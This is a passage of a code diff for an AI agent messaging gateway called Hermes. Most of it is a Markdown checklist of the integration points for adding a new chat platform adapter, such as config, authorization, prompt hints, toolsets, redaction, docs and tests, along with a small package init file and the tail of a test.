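    entry = store.approve_code("telegram", code)
    assert entry and store.is_approved("telegram", "424242")
```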

@@ -0,0 +1,313 @@
# Adding a New Messaging Platform
Checklist for integrating a new messaging platform into the Hermes gateway.
Use this as a reference when building a new adapter — every item here is a
real integration point that exists in the codebase. Missing any of them will
cause broken functionality, missing features, or inconsistent behavior.
---
## 1. Core Adapter (`gateway/platforms/<platform>.py`)
The adapter is a subclass of `BasePlatformAdapter` from `gateway/platforms/base.py`.
### Required methods
| Method | Purpose |
|--------|---------|
| `__init__(self, config)` | Parse config, init state. Call `super().__init__(config, Platform.YOUR_PLATFORM)` |
| `connect() -> bool` | Connect to the platform, start listeners. Return True on success |
| `disconnect()` | Stop listeners, close connections, cancel tasks |
| `send(chat_id, text, ...) -> SendResult` | Send a text message |
| `send_typing(chat_id)` | Send typing indicator |
| `send_image(chat_id, image_url, caption) -> SendResult` | Send an image |
| `get_chat_info(chat_id) -> dict` | Return `{name, type, chat_id}` for a chat |
### Optional methods (have default stubs in base)
| Method | Purpose |
|--------|---------|
| `send_document(chat_id, path, caption)` | Send a file attachment |
| `send_voice(chat_id, path)` | Send a voice message |
| `send_video(chat_id, path, caption)` | Send a video |
| `send_animation(chat_id, path, caption)` | Send a GIF/animation |
| `send_image_file(chat_id, path, caption)` | Send image from local file |
### Required function
```python
def check_<platform>_requirements() -> bool:
"""Check if this platform's dependencies are available."""
```
### Key patterns to follow
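A minimal skeleton tying these patterns together appears right after this list.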
- Use `self.build_source(...)` to construct `SessionSource` objects
- Call `self.handle_message(event)` to dispatch inbound messages to the gateway
- Use `MessageEvent`, `MessageType`, `SendResult` from base
- Use `cache_image_from_bytes`, `cache_audio_from_bytes`, `cache_document_from_bytes` for attachments
- Filter self-messages (prevent reply loops)
- Filter sync/echo messages if the platform has them
- Redact sensitive identifiers (phone numbers, tokens) in all log output
- Implement reconnection with exponential backoff + jitter for streaming connections
- Set `MAX_MESSAGE_LENGTH` if the platform has message size limits
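As promised, a minimal skeleton under the assumptions above (async signatures inferred from how the gateway awaits `adapter.send(...)`; the remaining required methods are elided):

```python
from gateway.config import Platform
from gateway.platforms.base import BasePlatformAdapter, SendResult

class YourAdapter(BasePlatformAdapter):
    MAX_MESSAGE_LENGTH = 4000  # illustrative platform limit

    def __init__(self, config):
        super().__init__(config, Platform.YOUR_PLATFORM)
        self._client = None  # platform SDK client, created in connect()

    async def connect(self) -> bool:
        # Start listeners; dispatch inbound events via self.handle_message(event)
        return True

    async def disconnect(self) -> None:
        self._client = None

    async def send(self, chat_id, text, **kwargs) -> SendResult:
        # Chunk against MAX_MESSAGE_LENGTH, call the platform API, map to SendResult
        raise NotImplementedError
```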
---
## 2. Platform Enum (`gateway/config.py`)
Add the platform to the `Platform` enum:
```python
class Platform(Enum):
...
YOUR_PLATFORM = "your_platform"
```
Add env var loading in `_apply_env_overrides()`:
```python
# Your Platform
your_token = os.getenv("YOUR_PLATFORM_TOKEN")
if your_token:
if Platform.YOUR_PLATFORM not in config.platforms:
config.platforms[Platform.YOUR_PLATFORM] = PlatformConfig()
config.platforms[Platform.YOUR_PLATFORM].enabled = True
config.platforms[Platform.YOUR_PLATFORM].token = your_token
```
Update `get_connected_platforms()` if your platform doesn't use token/api_key
(e.g., WhatsApp uses `enabled` flag, Signal uses `extra` dict).
---
## 3. Adapter Factory (`gateway/run.py`)
Add to `_create_adapter()`:
```python
elif platform == Platform.YOUR_PLATFORM:
from gateway.platforms.your_platform import YourAdapter, check_your_requirements
if not check_your_requirements():
logger.warning("Your Platform: dependencies not met")
return None
return YourAdapter(config)
```
---
## 4. Authorization Maps (`gateway/run.py`)
Add to BOTH dicts in `_is_user_authorized()`:
```python
platform_env_map = {
...
Platform.YOUR_PLATFORM: "YOUR_PLATFORM_ALLOWED_USERS",
}
platform_allow_all_map = {
...
Platform.YOUR_PLATFORM: "YOUR_PLATFORM_ALLOW_ALL_USERS",
}
```
---
## 5. Session Source (`gateway/session.py`)
If your platform needs extra identity fields (e.g., Signal's UUID alongside
phone number), add them to the `SessionSource` dataclass with `Optional` defaults,
and update `to_dict()`, `from_dict()`, and `build_source()` in base.py.
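For instance (field name illustrative), the change is a single optional field that must also survive the `to_dict()`/`from_dict()` round trip:

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class SessionSource:
    # ...existing fields unchanged...
    your_platform_uuid: Optional[str] = None  # extra identity, safe default
```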
---
## 6. System Prompt Hints (`agent/prompt_builder.py`)
Add a `PLATFORM_HINTS` entry so the agent knows what platform it's on:
```python
PLATFORM_HINTS = {
...
"your_platform": (
"You are on Your Platform. "
"Describe formatting capabilities, media support, etc."
),
}
```
Without this, the agent won't know it's on your platform and may use
inappropriate formatting (e.g., markdown on platforms that don't render it).
---
## 7. Toolset (`toolsets.py`)
Add a named toolset for your platform:
```python
"hermes-your-platform": {
"description": "Your Platform bot toolset",
"tools": _HERMES_CORE_TOOLS,
"includes": []
},
```
And add it to the `hermes-gateway` composite:
```python
"hermes-gateway": {
"includes": [..., "hermes-your-platform"]
}
```
---
## 8. Cron Delivery (`cron/scheduler.py`)
Add to `platform_map` in `_deliver_result()`:
```python
platform_map = {
...
"your_platform": Platform.YOUR_PLATFORM,
}
```
Without this, `schedule_cronjob(deliver="your_platform")` silently fails.
---
## 9. Send Message Tool (`tools/send_message_tool.py`)
Add to `platform_map` in `send_message_tool()`:
```python
platform_map = {
...
"your_platform": Platform.YOUR_PLATFORM,
}
```
Add routing in `_send_to_platform()`:
```python
elif platform == Platform.YOUR_PLATFORM:
return await _send_your_platform(pconfig, chat_id, message)
```
Implement `_send_your_platform()` — a standalone async function that sends
a single message without requiring the full adapter (for use by cron jobs
and the send_message tool outside the gateway process).
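A sketch of that standalone sender (the endpoint, payload shape, and `aiohttp` as the HTTP client are all placeholders for the real platform API):

```python
import aiohttp  # assumed available; any async HTTP client works

async def _send_your_platform(pconfig, chat_id: str, message: str) -> dict:
    """Send one message without the full adapter (cron / send_message tool)."""
    async with aiohttp.ClientSession() as session:
        async with session.post(
            "https://api.example.invalid/v1/send",        # placeholder endpoint
            json={"chat_id": chat_id, "text": message},
            headers={"Authorization": f"Bearer {pconfig.token}"},
        ) as resp:
            return {"success": resp.status == 200, "status": resp.status}
```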
Update the tool schema `target` description to include your platform example.
---
## 10. Cronjob Tool Schema (`tools/cronjob_tools.py`)
Update the `deliver` parameter description and docstring to mention your
platform as a delivery option.
---
## 11. Channel Directory (`gateway/channel_directory.py`)
If your platform can't enumerate chats (most can't), add it to the
session-based discovery list:
```python
for plat_name in ("telegram", "whatsapp", "signal", "your_platform"):
```
---
## 12. Status Display (`hermes_cli/status.py`)
Add to the `platforms` dict in the Messaging Platforms section:
```python
platforms = {
...
"Your Platform": ("YOUR_PLATFORM_TOKEN", "YOUR_PLATFORM_HOME_CHANNEL"),
}
```
---
## 13. Gateway Setup Wizard (`hermes_cli/gateway.py`)
Add to the `_PLATFORMS` list:
```python
{
"key": "your_platform",
"label": "Your Platform",
"emoji": "📱",
"token_var": "YOUR_PLATFORM_TOKEN",
"setup_instructions": [...],
"vars": [...],
}
```
If your platform needs custom setup logic (connectivity testing, QR codes,
policy choices), add a `_setup_your_platform()` function and route to it
in the platform selection switch.
Update `_platform_status()` if your platform's "configured" check differs
from the standard `bool(get_env_value(token_var))`.
---
## 14. Phone/ID Redaction (`agent/redact.py`)
If your platform uses sensitive identifiers (phone numbers, etc.), add a
regex pattern and redaction function to `agent/redact.py`. This ensures
identifiers are masked in ALL log output, not just your adapter's logs.
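A sketch of what that might look like (pattern and function name are placeholders; tune the regex to your platform's ID format):

```python
import re

# Example: mask long numeric user IDs, keeping two digits for correlation
_YOUR_PLATFORM_ID = re.compile(r"\b\d{6,}\b")

def redact_your_platform_ids(text: str) -> str:
    return _YOUR_PLATFORM_ID.sub(lambda m: "***" + m.group(0)[-2:], text)
```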
---
## 15. Documentation
| File | What to update |
|------|---------------|
| `README.md` | Platform list in feature table + documentation table |
| `AGENTS.md` | Gateway description + env var config section |
| `website/docs/user-guide/messaging/<platform>.md` | **NEW** — Full setup guide (see existing platform docs for template) |
| `website/docs/user-guide/messaging/index.md` | Architecture diagram, toolset table, security examples, Next Steps links |
| `website/docs/reference/environment-variables.md` | All env vars for the platform |
---
## 16. Tests (`tests/gateway/test_<platform>.py`)
Recommended test coverage (a sketch of the first two items follows these lists):
- Platform enum exists with correct value
- Config loading from env vars via `_apply_env_overrides`
- Adapter init (config parsing, allowlist handling, default values)
- Helper functions (redaction, parsing, file type detection)
- Session source round-trip (to_dict → from_dict)
- Authorization integration (platform in allowlist maps)
- Send message tool routing (platform in platform_map)
Optional but valuable:
- Async tests for message handling flow (mock the platform API)
- SSE/WebSocket reconnection logic
- Attachment processing
- Group message filtering
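A sketch of the first two items (pytest assumed; `_apply_env_overrides` is the function extended in step 2):

```python
from gateway.config import GatewayConfig, Platform, _apply_env_overrides

def test_platform_enum_value():
    assert Platform.YOUR_PLATFORM.value == "your_platform"

def test_env_override_enables_platform(monkeypatch):
    monkeypatch.setenv("YOUR_PLATFORM_TOKEN", "dummy")
    config = GatewayConfig()
    _apply_env_overrides(config)
    assert config.platforms[Platform.YOUR_PLATFORM].enabled
    assert config.platforms[Platform.YOUR_PLATFORM].token == "dummy"
```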
---
## Quick Verification
After implementing everything, verify with:
```bash
# All tests pass
python -m pytest tests/ -q
# Grep for your platform name to find any missed integration points
grep -r "telegram\|discord\|whatsapp\|slack" gateway/ tools/ agent/ cron/ hermes_cli/ toolsets.py \
--include="*.py" -l | sort -u
# Check each file in the output — if it mentions other platforms but not yours, you missed it
```


@@ -0,0 +1,17 @@
"""
Platform adapters for messaging integrations.
Each adapter handles:
- Receiving messages from a platform
- Sending messages/responses back
- Platform-specific authentication
- Message formatting and media handling
"""
from .base import BasePlatformAdapter, MessageEvent, SendResult
__all__ = [
"BasePlatformAdapter",
"MessageEvent",
"SendResult",
]

Some files were not shown because too many files have changed in this diff.